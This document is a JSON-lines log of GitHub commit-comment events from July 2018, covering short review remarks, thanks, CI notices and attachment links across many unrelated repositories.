{"id":"7934590860","type":"CommitCommentEvent","actor":{"login":"aarizirf"},"repo":{"name":"vkarpov15/thecodebarbarian.com"},"payload":{"comment":{"id":29635021,"position":null,"line":null,"path":null,"commit_id":"fce12c9704624a0112c42cf33c09696433ac3b57","created_at":"2018-07-08T21:01:58Z","updated_at":"2018-07-08T21:01:58Z","author_association":"NONE","body":"asdf"}},"created_at":"2018-07-08T21:01:58Z"}
{"id":"7934592278","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635022,"position":null,"line":null,"path":null,"commit_id":"11601dd5b75cc4701c26e7d3f961cb6d897a39b4","created_at":"2018-07-08T21:03:02Z","updated_at":"2018-07-08T21:03:02Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-08T21:03:02Z"}
{"id":"7934596024","type":"CommitCommentEvent","actor":{"login":"ColoradoStark"},"repo":{"name":"ColoradoStark/API-Server-Wrapper"},"payload":{"comment":{"id":29635025,"position":null,"line":null,"path":null,"commit_id":"23e54f10fedb737ed3f26d8c071340c62e98ea30","created_at":"2018-07-08T21:05:36Z","updated_at":"2018-07-08T21:05:36Z","author_association":"OWNER","body":"I also removed getting an obsolete python package in this commit"}},"created_at":"2018-07-08T21:05:36Z"}
{"id":"7934596383","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"vkarpov15/thecodebarbarian.com"},"payload":{"comment":{"id":29635026,"position":null,"line":null,"path":null,"commit_id":"fce12c9704624a0112c42cf33c09696433ac3b57","created_at":"2018-07-08T21:05:50Z","updated_at":"2018-07-08T21:05:50Z","author_association":"OWNER","body":"Can you please clarify that comment?"}},"created_at":"2018-07-08T21:05:50Z"}
{"id":"7934598699","type":"CommitCommentEvent","actor":{"login":"cvwang"},"repo":{"name":"MilliApp/ios"},"payload":{"comment":{"id":29635030,"position":null,"line":null,"path":null,"commit_id":"296c7a65269f27890c29ec90f65d69573c3f9e32","created_at":"2018-07-08T21:07:29Z","updated_at":"2018-07-08T21:07:29Z","author_association":"CONTRIBUTOR","body":"closes #8 "}},"created_at":"2018-07-08T21:07:29Z"}
{"id":"7934599808","type":"CommitCommentEvent","actor":{"login":"RReverser"},"repo":{"name":"woothee/woothee-rust"},"payload":{"comment":{"id":29635032,"position":null,"line":null,"path":null,"commit_id":"a3f71357062a0fa0748d0bdee598a424415b5a8e","created_at":"2018-07-08T21:08:14Z","updated_at":"2018-07-08T21:08:14Z","author_association":"CONTRIBUTOR","body":"Yep, this looks good to me and addresses my concern. Thanks! "}},"created_at":"2018-07-08T21:08:14Z"}
{"id":"7934603265","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635042,"position":null,"line":null,"path":null,"commit_id":"b807b75857b7a2d0fed5d69e9fde978638969570","created_at":"2018-07-08T21:10:42Z","updated_at":"2018-07-08T21:10:42Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-1](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T21:10:42Z"}
{"id":"7934603817","type":"CommitCommentEvent","actor":{"login":"pereorga"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29635043,"position":null,"line":null,"path":null,"commit_id":"78841689526ce3dbfa7c266f5bb58506a30b2c7e","created_at":"2018-07-08T21:11:05Z","updated_at":"2018-07-08T21:11:05Z","author_association":"OWNER","body":"You mean the comment or the if?"}},"created_at":"2018-07-08T21:11:05Z"}
{"id":"7934604748","type":"CommitCommentEvent","actor":{"login":"ozskywalker"},"repo":{"name":"ozskywalker/minerva"},"payload":{"comment":{"id":29635046,"position":null,"line":null,"path":null,"commit_id":"6ee085372ab0dd01cf0b431df7c45694fe65aaab","created_at":"2018-07-08T21:11:53Z","updated_at":"2018-07-08T21:11:53Z","author_association":"OWNER","body":"This supports #3 "}},"created_at":"2018-07-08T21:11:53Z"}
{"id":"7934605098","type":"CommitCommentEvent","actor":{"login":"a3f"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29635047,"position":null,"line":null,"path":null,"commit_id":"b588af5ce22691bb143dcd784858e3c331c4a1e6","created_at":"2018-07-08T21:12:09Z","updated_at":"2018-07-08T21:12:09Z","author_association":"COLLABORATOR","body":"We could maintain a separate repository for our GLFW fork. That way we can just run `git rebase` any raylib specific changes we do to GLFW. #572 also suggests modifications to GLFW and these might be overridden unintentionally as well.\r\n\r\nThe GLFW fork can either be copied over to the raylib directory from time to time or added as a git submodule. I'd prefer the latter, but we might have to remind people often that they need to use `git clone --recursive`. What do you think?"}},"created_at":"2018-07-08T21:12:09Z"}
{"id":"7934605307","type":"CommitCommentEvent","actor":{"login":"ozskywalker"},"repo":{"name":"ozskywalker/minerva"},"payload":{"comment":{"id":29635048,"position":null,"line":null,"path":null,"commit_id":"d6ec5a3558eba5b56986e1269239b2786528019d","created_at":"2018-07-08T21:12:17Z","updated_at":"2018-07-08T21:12:17Z","author_association":"OWNER","body":"This completes 50% of the Newspaper layout feature for #3 - next remaining component is the foldout button"}},"created_at":"2018-07-08T21:12:17Z"}
{"id":"7934606245","type":"CommitCommentEvent","actor":{"login":"goldbyt"},"repo":{"name":"goldbyt/fly"},"payload":{"comment":{"id":29635049,"position":null,"line":null,"path":null,"commit_id":"b5db99460266276700667790a54f37311b6ce039","created_at":"2018-07-08T21:12:55Z","updated_at":"2018-07-08T21:12:55Z","author_association":"OWNER","body":"you can fly..its easy no wings needed "}},"created_at":"2018-07-08T21:12:55Z"}
{"id":"7934608025","type":"CommitCommentEvent","actor":{"login":"qex"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29635054,"position":null,"line":null,"path":null,"commit_id":"78841689526ce3dbfa7c266f5bb58506a30b2c7e","created_at":"2018-07-08T21:14:11Z","updated_at":"2018-07-08T21:14:11Z","author_association":"CONTRIBUTOR","body":"Yup, if we ignore the last half of `or`, it will become `If provided file name is empty, discard it`."}},"created_at":"2018-07-08T21:14:11Z"}
{"id":"7934609138","type":"CommitCommentEvent","actor":{"login":"ftsalamp"},"repo":{"name":"ftsalamp/wayback-discover-diff"},"payload":{"comment":{"id":29635057,"position":21,"line":22,"path":"wayback_discover_diff/discover.py","commit_id":"7795927f246a228053b787c51413fff4f66aa988","created_at":"2018-07-08T21:15:00Z","updated_at":"2018-07-08T21:15:00Z","author_association":"OWNER","body":"@vbanos Do we also want to set the max number of redirects?"}},"created_at":"2018-07-08T21:15:00Z"}
{"id":"7934610504","type":"CommitCommentEvent","actor":{"login":"jordiqb"},"repo":{"name":"jordiqb/website"},"payload":{"comment":{"id":29635063,"position":1,"line":1,"path":"lipsum.txt","commit_id":"eea59cea62cca9526eb2fd0333ba32a8db74a429","created_at":"2018-07-08T21:15:59Z","updated_at":"2018-07-08T21:15:59Z","author_association":"OWNER","body":"### Lipsum REally?\r\n\r\nAdding a comment"}},"created_at":"2018-07-08T21:15:59Z"}
{"id":"7934611158","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29635064,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-08T21:16:27Z","updated_at":"2018-07-08T21:16:27Z","author_association":"MEMBER","body":"Ok. And btw if server-only build doesn't have libjpeg/libpng, then it should be able to work without textures? Because in this case I could rm all png/jpg/ogg/po/ttf to make it smaller. Currently it needs textures for loading a track.\r\n\r\nAnd we probably need a script to make the server-only build working as a daemon. I have something that is kind of working (quick hack). I wonder if it's possible to send a packet/signal to shutdown/restart the server. And I wonder how stk server behaves when computer is suspended or connection is lost (will check later)."}},"created_at":"2018-07-08T21:16:27Z"}
{"id":"7934611834","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29635065,"position":null,"line":null,"path":null,"commit_id":"1fdbbea4c7f18a1bbb9fd9fab65dc7339f167722","created_at":"2018-07-08T21:16:54Z","updated_at":"2018-07-08T21:16:54Z","author_association":"MEMBER","body":"Same in HandleLearnAllGMCommand"}},"created_at":"2018-07-08T21:16:54Z"}
{"id":"7934612914","type":"CommitCommentEvent","actor":{"login":"MaidouPP"},"repo":{"name":"RoboSherlock/uimacpp_ros"},"payload":{"comment":{"id":29635066,"position":22,"line":35,"path":"src/framework/CMakeLists.txt","commit_id":"65192cc32985b5df2564444dc38386cdd3eb7149","created_at":"2018-07-08T21:17:35Z","updated_at":"2018-07-08T21:17:35Z","author_association":"COLLABORATOR","body":"Ohhh sorry this is added when I was pulling hair suspecting and testing everything... It should be deleted."}},"created_at":"2018-07-08T21:17:35Z"}
{"id":"7934615933","type":"CommitCommentEvent","actor":{"login":"pereorga"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29635070,"position":null,"line":null,"path":null,"commit_id":"78841689526ce3dbfa7c266f5bb58506a30b2c7e","created_at":"2018-07-08T21:19:46Z","updated_at":"2018-07-08T21:19:46Z","author_association":"OWNER","body":"I think that's grammatically correct. Provided input can be empty. And you can discard something that is empty."}},"created_at":"2018-07-08T21:19:46Z"}
{"id":"7934616026","type":"CommitCommentEvent","actor":{"login":"Hisham-H4A"},"repo":{"name":"Hisham-H4A/Module-2-assignment"},"payload":{"comment":{"id":29635071,"position":null,"line":null,"path":null,"commit_id":"6f5b3a184d431977b6938fd00dc47c94d57d92cf","created_at":"2018-07-08T21:19:51Z","updated_at":"2018-07-08T21:19:51Z","author_association":"OWNER","body":"styles update\r\n"}},"created_at":"2018-07-08T21:19:51Z"}
{"id":"7934619818","type":"CommitCommentEvent","actor":{"login":"attackfrog"},"repo":{"name":"attackfrog/project1"},"payload":{"comment":{"id":29635077,"position":null,"line":null,"path":null,"commit_id":"5dbf3d50db9b4b5fff22fe80a573fc6674e06bfb","created_at":"2018-07-08T21:22:26Z","updated_at":"2018-07-08T21:22:26Z","author_association":"OWNER","body":"I don't know what was going on with this..."}},"created_at":"2018-07-08T21:22:26Z"}
{"id":"7934621245","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29635079,"position":null,"line":null,"path":null,"commit_id":"ee67177ebcb5a3d41ff69a1308c7cd046a5a5eb2","created_at":"2018-07-08T21:23:20Z","updated_at":"2018-07-08T21:23:20Z","author_association":"COLLABORATOR","body":"I'm sorry I didn't see these comments on time. These changes has been made in 8c1738588678f66ed29a6da31c4b7a6f243eaabe."}},"created_at":"2018-07-08T21:23:20Z"}
{"id":"7934622677","type":"CommitCommentEvent","actor":{"login":"qex"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29635083,"position":null,"line":null,"path":null,"commit_id":"78841689526ce3dbfa7c266f5bb58506a30b2c7e","created_at":"2018-07-08T21:24:16Z","updated_at":"2018-07-08T21:24:16Z","author_association":"CONTRIBUTOR","body":"That's alright, I'm going to keep thinking about `$name`."}},"created_at":"2018-07-08T21:24:16Z"}
{"id":"7934630779","type":"CommitCommentEvent","actor":{"login":"kapilviswa"},"repo":{"name":"kapilviswa/kapilviswa.github.io"},"payload":{"comment":{"id":29635100,"position":null,"line":null,"path":null,"commit_id":"0c16d9a06f1298710dc486374386cae5437b7cb4","created_at":"2018-07-08T21:30:08Z","updated_at":"2018-07-08T21:30:08Z","author_association":"OWNER","body":"reverting"}},"created_at":"2018-07-08T21:30:08Z"}
{"id":"7934630893","type":"CommitCommentEvent","actor":{"login":"tflick"},"repo":{"name":"AnnaVorl/Satellitenbahn"},"payload":{"comment":{"id":29635101,"position":null,"line":null,"path":null,"commit_id":"c2eebe973e0c74fdf654f0b76df297466a8cf690","created_at":"2018-07-08T21:30:12Z","updated_at":"2018-07-08T21:30:12Z","author_association":"COLLABORATOR","body":"ah ok, da ist etwas ein level höher hochgeladen worden..."}},"created_at":"2018-07-08T21:30:12Z"}
{"id":"7934631261","type":"CommitCommentEvent","actor":{"login":"tkipf"},"repo":{"name":"tkipf/pygcn"},"payload":{"comment":{"id":29635104,"position":null,"line":null,"path":null,"commit_id":"88c6676b2ab98b04bf3bef96b46ea037ebb07b12","created_at":"2018-07-08T21:30:24Z","updated_at":"2018-07-08T21:30:24Z","author_association":"OWNER","body":"Thanks for the hint! I will consider changing this as soon as it is reasonable to drop python 2.7 backwards compatibility."}},"created_at":"2018-07-08T21:30:24Z"}
{"id":"7934634495","type":"CommitCommentEvent","actor":{"login":"julisaelizabeht"},"repo":{"name":"SaulMontoya/Tutorial-para-realizar-una-Rosa-de-Vientos-con-Python"},"payload":{"comment":{"id":29635107,"position":1,"line":1,"path":"Rosa de Vientos.ipynb","commit_id":"23ea2f3fd6e21988e68a945098380e8818404ac8","created_at":"2018-07-08T21:32:39Z","updated_at":"2018-07-08T21:32:39Z","author_association":"NONE","body":"[Datos_Rosa_de_Vientos (1).xlsx](https://github.com/SaulMontoya/Tutorial-para-realizar-una-Rosa-de-Vientos-con-Python/files/2174144/Datos_Rosa_de_Vientos.1.xlsx)\r\n"}},"created_at":"2018-07-08T21:32:39Z"}
{"id":"7934637736","type":"CommitCommentEvent","actor":{"login":"jnbr"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29635110,"position":null,"line":null,"path":null,"commit_id":"ea662567b2d323aa4066af83670d0f281a7ac647","created_at":"2018-07-08T21:34:58Z","updated_at":"2018-07-08T21:34:58Z","author_association":"CONTRIBUTOR","body":"Sorry for breaking it. I only tested it with m4a and ogg files which seemed to work. Tested again with mp3 and opus shows segfaults or `Error decoding audio, skipping audio package: frame_reader_run(), \"ffsox_frame_reader.c\" (151).` I can have a look at it in the coming week."}},"created_at":"2018-07-08T21:34:58Z"}
{"id":"7934638862","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29635111,"position":null,"line":null,"path":null,"commit_id":"1a78ab3c7f5c5706d0a0bec0315f1e6d9aee2112","created_at":"2018-07-08T21:35:51Z","updated_at":"2018-07-08T21:35:51Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/eslint-5.x.311`__ :crossed_fingers: [`renovate/eslint-5.x`](https://github.com/streamich/ci-scripts/tree/renovate/eslint-5.x) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/401539472) :tada:"}},"created_at":"2018-07-08T21:35:51Z"}
{"id":"7934639511","type":"CommitCommentEvent","actor":{"login":"Reminisque"},"repo":{"name":"Reminisque/node-playlist"},"payload":{"comment":{"id":29635113,"position":null,"line":null,"path":null,"commit_id":"8920591fa18b1578b8b0966b61bbf7ee1323a0b7","created_at":"2018-07-08T21:36:21Z","updated_at":"2018-07-08T21:36:21Z","author_association":"OWNER","body":"When a tab to the app is closed and reopened, the volume slider remains in the same position as when the tab was closed. Before the addition of setting the volume in the init function, the volume would reset to max volume when the tab is reopened despite the slider not being at max. Now the volume is properly set to the value of the slider when the tab is closed and reopened."}},"created_at":"2018-07-08T21:36:21Z"}
{"id":"7934640307","type":"CommitCommentEvent","actor":{"login":"skaman123"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29635117,"position":null,"line":null,"path":null,"commit_id":"1026ebb0ebd632ef7a9c660f8c6f59fd448e8f73","created_at":"2018-07-08T21:36:58Z","updated_at":"2018-07-08T21:36:58Z","author_association":"NONE","body":"ah ok now i know thanks alot SIR @jekkos  ;)"}},"created_at":"2018-07-08T21:36:58Z"}
{"id":"7934641370","type":"CommitCommentEvent","actor":{"login":"oneeyedman"},"repo":{"name":"Adalab/d-s1-evaluacion-intermedia-SofiaRinconArtMath"},"payload":{"comment":{"id":29635119,"position":null,"line":null,"path":null,"commit_id":"a962904b8530cd93bbece2262ac29895c162625c","created_at":"2018-07-08T21:37:45Z","updated_at":"2018-07-08T21:37:45Z","author_association":"MEMBER","body":"Lo has subido al repo equivocado... mañana vemos cómo subes las cosas porque me parece que el método que has elegido es un error."}},"created_at":"2018-07-08T21:37:45Z"}
{"id":"7934642037","type":"CommitCommentEvent","actor":{"login":"Oxid15"},"repo":{"name":"Oxid15/Perceptron"},"payload":{"comment":{"id":29635120,"position":null,"line":null,"path":null,"commit_id":"d4d63a5ba76fccac8dfb8868325763af879b0d76","created_at":"2018-07-08T21:38:14Z","updated_at":"2018-07-08T21:38:14Z","author_association":"OWNER","body":"нарушения поправлю\r\nскорее всего изменю и сами вычисления"}},"created_at":"2018-07-08T21:38:14Z"}
{"id":"7934642776","type":"CommitCommentEvent","actor":{"login":"hor-net"},"repo":{"name":"olilarkin/wdl-ol"},"payload":{"comment":{"id":29635121,"position":null,"line":null,"path":null,"commit_id":"4a88575f82c0c577b28fc3b27279456b12b187fe","created_at":"2018-07-08T21:38:52Z","updated_at":"2018-07-08T21:38:52Z","author_association":"CONTRIBUTOR","body":"If parameter number changes with the current method we are passing a size that may be larger than the size of the saved chunk in the DAW project leading to potential issues.\r\nWith the proposed patch we read data from the state until it's finished making sure we always have the number of bytes that we saved with the session in the first place."}},"created_at":"2018-07-08T21:38:52Z"}
{"id":"7934643604","type":"CommitCommentEvent","actor":{"login":"Reminisque"},"repo":{"name":"Reminisque/node-playlist"},"payload":{"comment":{"id":29635124,"position":27,"line":310,"path":"public/client.js","commit_id":"8920591fa18b1578b8b0966b61bbf7ee1323a0b7","created_at":"2018-07-08T21:39:32Z","updated_at":"2018-07-08T21:39:32Z","author_association":"OWNER","body":"Makes a smoother looking visualization"}},"created_at":"2018-07-08T21:39:32Z"}
{"id":"7934645156","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"nephatrine/wrye-bash"},"payload":{"comment":{"id":29635126,"position":57,"line":57,"path":"Mopy/bash/game/fallout4vr/__init__.py","commit_id":"98588a5770ddc4342f722fbf9f8a4f3fcd70371a","created_at":"2018-07-08T21:40:43Z","updated_at":"2018-07-08T21:40:43Z","author_association":"NONE","body":"@nephatrine Is that the entry, exactly wit the spaces ```Bethesda Softworks\\\\Fallout 4 VR```?"}},"created_at":"2018-07-08T21:40:43Z"}
{"id":"7934646978","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"nephatrine/wrye-bash"},"payload":{"comment":{"id":29635130,"position":26,"line":920,"path":"Mopy/bash/games.py","commit_id":"98588a5770ddc4342f722fbf9f8a4f3fcd70371a","created_at":"2018-07-08T21:42:13Z","updated_at":"2018-07-08T21:42:13Z","author_association":"NONE","body":"@nephatrine Is that the name of the folder under Documents, specifically ```C:\\Users\\Dano\\Documents\\My Games\\Fallout4```."}},"created_at":"2018-07-08T21:42:13Z"}
{"id":"7934647899","type":"CommitCommentEvent","actor":{"login":"oscar254"},"repo":{"name":"oscar254/hello-world"},"payload":{"comment":{"id":29635132,"position":null,"line":null,"path":null,"commit_id":"70c660b46a3a87f0d92572183ef7e5789c644524","created_at":"2018-07-08T21:42:57Z","updated_at":"2018-07-08T21:42:57Z","author_association":"OWNER","body":"Comment on this commit"}},"created_at":"2018-07-08T21:42:57Z"}
{"id":"7934648049","type":"CommitCommentEvent","actor":{"login":"julisaelizabeht"},"repo":{"name":"SaulMontoya/Tutorial-para-realizar-una-Rosa-de-Vientos-con-Python"},"payload":{"comment":{"id":29635133,"position":1,"line":1,"path":"Rosa de Vientos.ipynb","commit_id":"23ea2f3fd6e21988e68a945098380e8818404ac8","created_at":"2018-07-08T21:43:04Z","updated_at":"2018-07-08T21:43:04Z","author_association":"NONE","body":"[Datos_Rosa_de_Vientos.xlsx](https://github.com/SaulMontoya/Tutorial-para-realizar-una-Rosa-de-Vientos-con-Python/files/2174155/Datos_Rosa_de_Vientos.xlsx)\r\n"}},"created_at":"2018-07-08T21:43:04Z"}
{"id":"7934648262","type":"CommitCommentEvent","actor":{"login":"Hugu90"},"repo":{"name":"Hugu90/autre_exemple"},"payload":{"comment":{"id":29635134,"position":33,"line":33,"path":"exo2_while.rb","commit_id":"6809a0b64f889b5d2d371013f817d1c793284892","created_at":"2018-07-08T21:43:12Z","updated_at":"2018-07-08T21:43:12Z","author_association":"OWNER","body":"# Ha ok"}},"created_at":"2018-07-08T21:43:12Z"}
{"id":"7934649169","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"nephatrine/wrye-bash"},"payload":{"comment":{"id":29635135,"position":5,"line":578,"path":"Mopy/bash/bosh/bsa_files.py","commit_id":"98588a5770ddc4342f722fbf9f8a4f3fcd70371a","created_at":"2018-07-08T21:43:55Z","updated_at":"2018-07-08T21:43:55Z","author_association":"NONE","body":"What is the exact folder name for the game like ```G:\\Steam\\steamapps\\common\\Skyrim Special Edition``` with spaces."}},"created_at":"2018-07-08T21:43:55Z"}
{"id":"7934650704","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29635143,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-08T21:45:05Z","updated_at":"2018-07-08T21:45:05Z","author_association":"CONTRIBUTOR","body":"Yes, I proceeded from the situation that the function by default will redraw the player's inventory despite the argument.\r\nIn this case, you need to add a usage error message, although it may not be necessary."}},"created_at":"2018-07-08T21:45:05Z"}
{"id":"7934651402","type":"CommitCommentEvent","actor":{"login":"kriegste"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29635148,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-08T21:45:37Z","updated_at":"2018-07-08T21:45:37Z","author_association":"NONE","body":"Will SSL connections benefit from the increased heap? This has been the bottleneck in the past versions."}},"created_at":"2018-07-08T21:45:37Z"}
{"id":"7934653961","type":"CommitCommentEvent","actor":{"login":"ChaltinPagan"},"repo":{"name":"ChaltinPagan/chaltinpagan.github.io"},"payload":{"comment":{"id":29635152,"position":null,"line":null,"path":null,"commit_id":"fc337256eba9b4cc8bccc27b365737b737663fec","created_at":"2018-07-08T21:47:34Z","updated_at":"2018-07-08T21:47:34Z","author_association":"OWNER","body":"Adding Bootstrap responsive nav bar."}},"created_at":"2018-07-08T21:47:34Z"}
{"id":"7934654040","type":"CommitCommentEvent","actor":{"login":"aleks-djuric"},"repo":{"name":"aleks-djuric/hand-raised-detector"},"payload":{"comment":{"id":29635153,"position":null,"line":null,"path":null,"commit_id":"cd604429092f3271712471eb64a8d37bbf451a13","created_at":"2018-07-08T21:47:37Z","updated_at":"2018-07-08T21:47:37Z","author_association":"OWNER","body":"I can't get you the model since its on my Clarifai account but I attached the data I used to train the model. You can re-build a model on Clarifai pretty easily if you want but keep in mind you have to send the individual people in each frame to them to have them classified as raised or not. They only give you 5000 api calls or something for free. For a serious implementation of this, I would suggest downloading a pre-trained keras image net model and training it on the data. If you do some data augmentation it should be enough to get some pretty good results I think. Good luck!\r\n\r\n[data.zip](https://github.com/aleks-djuric/hand-raised-detector/files/2174157/data.zip)\r\n"}},"created_at":"2018-07-08T21:47:37Z"}
{"id":"7934654612","type":"CommitCommentEvent","actor":{"login":"barbequesauce"},"repo":{"name":"evilhero/mylar"},"payload":{"comment":{"id":29635155,"position":null,"line":null,"path":null,"commit_id":"22de99943bc63039e33d27c3333ca490f2a4b8fc","created_at":"2018-07-08T21:48:05Z","updated_at":"2018-07-08T21:48:05Z","author_association":"CONTRIBUTOR","body":"The change on lines 86-87 break OPDS usage if you’re not using a reading list... should 86 test if a reading list in use maybe?"}},"created_at":"2018-07-08T21:48:05Z"}
{"id":"7934659879","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635161,"position":null,"line":null,"path":null,"commit_id":"a846f9e68bc01a777129c47f6805bd45e641c12d","created_at":"2018-07-08T21:52:05Z","updated_at":"2018-07-08T21:52:05Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://192.168.1.13:8085/spec-logs/1736705/a846f9e68bc01a777129c47f6805bd45e641c12d.log?referrer=commit)\n\n"}},"created_at":"2018-07-08T21:52:05Z"}
{"id":"7934661035","type":"CommitCommentEvent","actor":{"login":"publicarray"},"repo":{"name":"frebib/machine"},"payload":{"comment":{"id":29635163,"position":null,"line":null,"path":null,"commit_id":"44cc0e885e0cbf0f1f04e7b050d84ecd4223bacb","created_at":"2018-07-08T21:52:54Z","updated_at":"2018-07-08T21:52:54Z","author_association":"NONE","body":"I think you missed the `apk update` at the end. It is needed to update the local repository database"}},"created_at":"2018-07-08T21:52:54Z"}
{"id":"7934669726","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635178,"position":null,"line":null,"path":null,"commit_id":"e0b3d03c6607d52dde9802514d1faf3defc8b1a5","created_at":"2018-07-08T21:59:34Z","updated_at":"2018-07-08T21:59:34Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://192.168.1.13:8085/spec-logs/1736705/e0b3d03c6607d52dde9802514d1faf3defc8b1a5.log?referrer=commit)\n\n"}},"created_at":"2018-07-08T21:59:34Z"}
{"id":"7934669876","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29635179,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-08T21:59:42Z","updated_at":"2018-07-08T21:59:42Z","author_association":"MEMBER","body":"And let me know if there is something more that I need to set. Currently it's started with\r\n```\r\n--ranked                  \\\r\n           --max-players=8           \\\r\n           --mode=3                  \\\r\n           --type=1                  \\\r\n           --wan-server=\"STK Server\" \\\r\n           --login=devetest          \\\r\n           --password=xxxx    \\\r\n           --log=5   \r\n```\r\nand start-game-threshold is changed to 0.2 in config.xml."}},"created_at":"2018-07-08T21:59:42Z"}
{"id":"7934672966","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev-CC/CC-Tweaked"},"payload":{"comment":{"id":29635190,"position":null,"line":null,"path":null,"commit_id":"81aaead032f0639e1bc557d20d55a5062e2b010d","created_at":"2018-07-08T22:01:43Z","updated_at":"2018-07-08T22:01:43Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Shulker box dupe](https://trello.com/c/paM16Op1/2-shulker-box-dupe)"}},"created_at":"2018-07-08T22:01:43Z"}
{"id":"7934673263","type":"CommitCommentEvent","actor":{"login":"moosefromhell"},"repo":{"name":"moosefromhell/Repository_of_Nutshots"},"payload":{"comment":{"id":29635191,"position":null,"line":null,"path":null,"commit_id":"8f2217ad12b31ae2b541b23508ca137b8d45b6d9","created_at":"2018-07-08T22:01:57Z","updated_at":"2018-07-08T22:01:57Z","author_association":"OWNER","body":"Leedle lee "}},"created_at":"2018-07-08T22:01:57Z"}
{"id":"7934673385","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev-CC/CC-Tweaked"},"payload":{"comment":{"id":29635192,"position":null,"line":null,"path":null,"commit_id":"000786a1a706000c7019c230043a793a173722a1","created_at":"2018-07-08T22:02:02Z","updated_at":"2018-07-08T22:02:02Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Shulker box dupe](https://trello.com/c/paM16Op1/2-shulker-box-dupe)"}},"created_at":"2018-07-08T22:02:02Z"}
{"id":"7934673388","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev-CC/CC-Tweaked"},"payload":{"comment":{"id":29635193,"position":null,"line":null,"path":null,"commit_id":"000786a1a706000c7019c230043a793a173722a1","created_at":"2018-07-08T22:02:02Z","updated_at":"2018-07-08T22:02:02Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Shulker box dupe](https://trello.com/c/paM16Op1/2-shulker-box-dupe)"}},"created_at":"2018-07-08T22:02:02Z"}
{"id":"7934673883","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635194,"position":null,"line":null,"path":null,"commit_id":"83c1e7dd986c073e432cc23907272dd9789f7576","created_at":"2018-07-08T22:02:24Z","updated_at":"2018-07-08T22:02:24Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://192.168.1.13:8085/spec-logs/1736705/83c1e7dd986c073e432cc23907272dd9789f7576.log?referrer=commit)\n\n"}},"created_at":"2018-07-08T22:02:24Z"}
{"id":"7934673958","type":"CommitCommentEvent","actor":{"login":"nasumilu"},"repo":{"name":"nasumilu/geometry-serializer"},"payload":{"comment":{"id":29635195,"position":null,"line":null,"path":null,"commit_id":"b9ef2694c5a119e781a93aeb24c4be765f3a675f","created_at":"2018-07-08T22:02:28Z","updated_at":"2018-07-08T22:02:28Z","author_association":"OWNER","body":"update composer file"}},"created_at":"2018-07-08T22:02:28Z"}
{"id":"7934676599","type":"CommitCommentEvent","actor":{"login":"Mugen87"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":29635202,"position":null,"line":null,"path":null,"commit_id":"fcf6b61a74ee0ae2085d7133ff0907dcefa2b510","created_at":"2018-07-08T22:04:38Z","updated_at":"2018-07-08T22:04:38Z","author_association":"COLLABORATOR","body":"I like this pimped version of `MarchingCubes` 😊 "}},"created_at":"2018-07-08T22:04:38Z"}
